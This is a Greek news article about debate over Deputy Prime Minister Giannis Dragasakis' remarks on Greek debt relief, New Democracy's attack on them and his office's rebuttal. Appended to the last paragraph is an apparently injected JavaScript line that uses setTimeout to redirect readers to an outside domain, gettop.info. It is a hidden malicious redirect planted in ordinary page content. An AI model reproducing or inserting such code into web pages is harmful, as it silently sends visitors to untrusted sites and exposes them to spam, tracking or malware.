Διευκρινίσεις αντιπροεδρίας για την απομείωση του χρέους του Δραγασάκη

0
4

 

Σε διευκρινίσεις προχώρησε η αντιπροεδρία της κυβέρνησης γύρω από το θέμα που δημιουργήθηκε με αναφορά του αντιπροέδρου Γιάννη Δραγασάκη στο πλαίσιο της τοποθέτησής του για το χρέος, στην ειδική Επιτροπή της Βουλής, προκαλώντας έντονες αντιδράσεις.

Σύμφωνα με την επίμαχη αναφορά «ακόμα και να έρθουν πολύ ευνοϊκά τα πράγματα, μιλάμε για μια διαδικασία που εξ ορισμού πάει και πέρα από το 2018». Επίσης, ο αντιπρόεδρος της κυβέρνησης κλείνοντας την ομιλία του εξέφρασε την άποψη ότι «ακόμη και την καλύτερη λύση να πετύχουμε σήμερα, έχουμε την εξής ιδιομορφία, ότι πιστωτές μας είναι και αυτοί υπερδανεισμένοι».

Η ΝΔ ανέδειξε το θέμα και σε ανακοίνωση που εξέδωσε αφού θύμισε την πρόσφατη δήλωση του πρωθυπουργού από τη ΔΕΘ ότι η ρύθμιση του χρέους είναι πιο κοντά από ποτέ, σημείωσε: «Σήμερα, ο κ. Δραγασάκης, μιλώντας σε Επιτροπή της Βουλής, υποστήριξε ότι “ακόμα και να έχουμε πολύ ευνοϊκά πράγματα, μιλάμε για μια εξ ορισμού διαδικασία, που πάει πέρα από το 2018”.

Και πρόσθεσε: “Παράλληλα οι διαδικασίες μπορεί να είναι μακροχρόνιες, δηλαδή, δεν είναι βέβαιο ότι θα τελειώσει γρήγορα το θέμα του χρέους”. Ο κ. Δραγασάκης ανέδειξε άλλο ένα από τα ψέματα του κ. Τσίπρα» αναφέρει η ΝΔ.
Λίγη ώρα αργότερα το Μαξίμου με διαρροές υποστήριξε ότι δεν υπάρχει αντίφαση μεταξύ των λεγομένων Δραγασάκη και των όσων είπε πρόσφατα ο πρωθυπουργός.

Αργότερα, μάλιστα η αντιπροεδρία προκειμένου να διασκεδάσει τις εντυπώσεις εξέδωσε ανακοίνωση όπου κάνει λόγο περί «μονταζιέρας» της ΝΔ. Στην ανακοίνωση αναφέρει: Η Νέα Δημοκρατία, για μια ακόμη φορά, προσπαθεί να δημιουργήσει εντυπώσεις, διαστρεβλώνοντας με τη γνωστή μέθοδο της «μονταζιέρας».

Η ομιλία του Αντιπροέδρου της Κυβέρνησης έγινε σε ανοικτή συνεδρίαση της Υποεπιτροπής της Βουλής των Ελλήνων με θέμα το «Το χρέος και η Απομείωσή του» και είναι δημόσια.

Εκείνο που ο Αντιπρόεδρος τόνισε με απόλυτη σαφήνεια είναι ότι διεκδικούμε άμεσα ευνοϊκή ρύθμιση για το χρέος, με βάση την απόφαση του Eurogroup της 25ης Μαΐου 2016. Αυτό, σε καμία περίπτωση δεν σημαίνει ότι παραιτούμαστε από την πάγια θέση μας, δηλαδή από την προσπάθεια να συγκροτήσουμε ένα μέτωπο με άλλες χώρες, ώστε να προωθήσουμε ριζική και οριστική πανευρωπαϊκή λύση για το χρέος, τόσο το ελληνικό όσο και των άλλων κρατών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here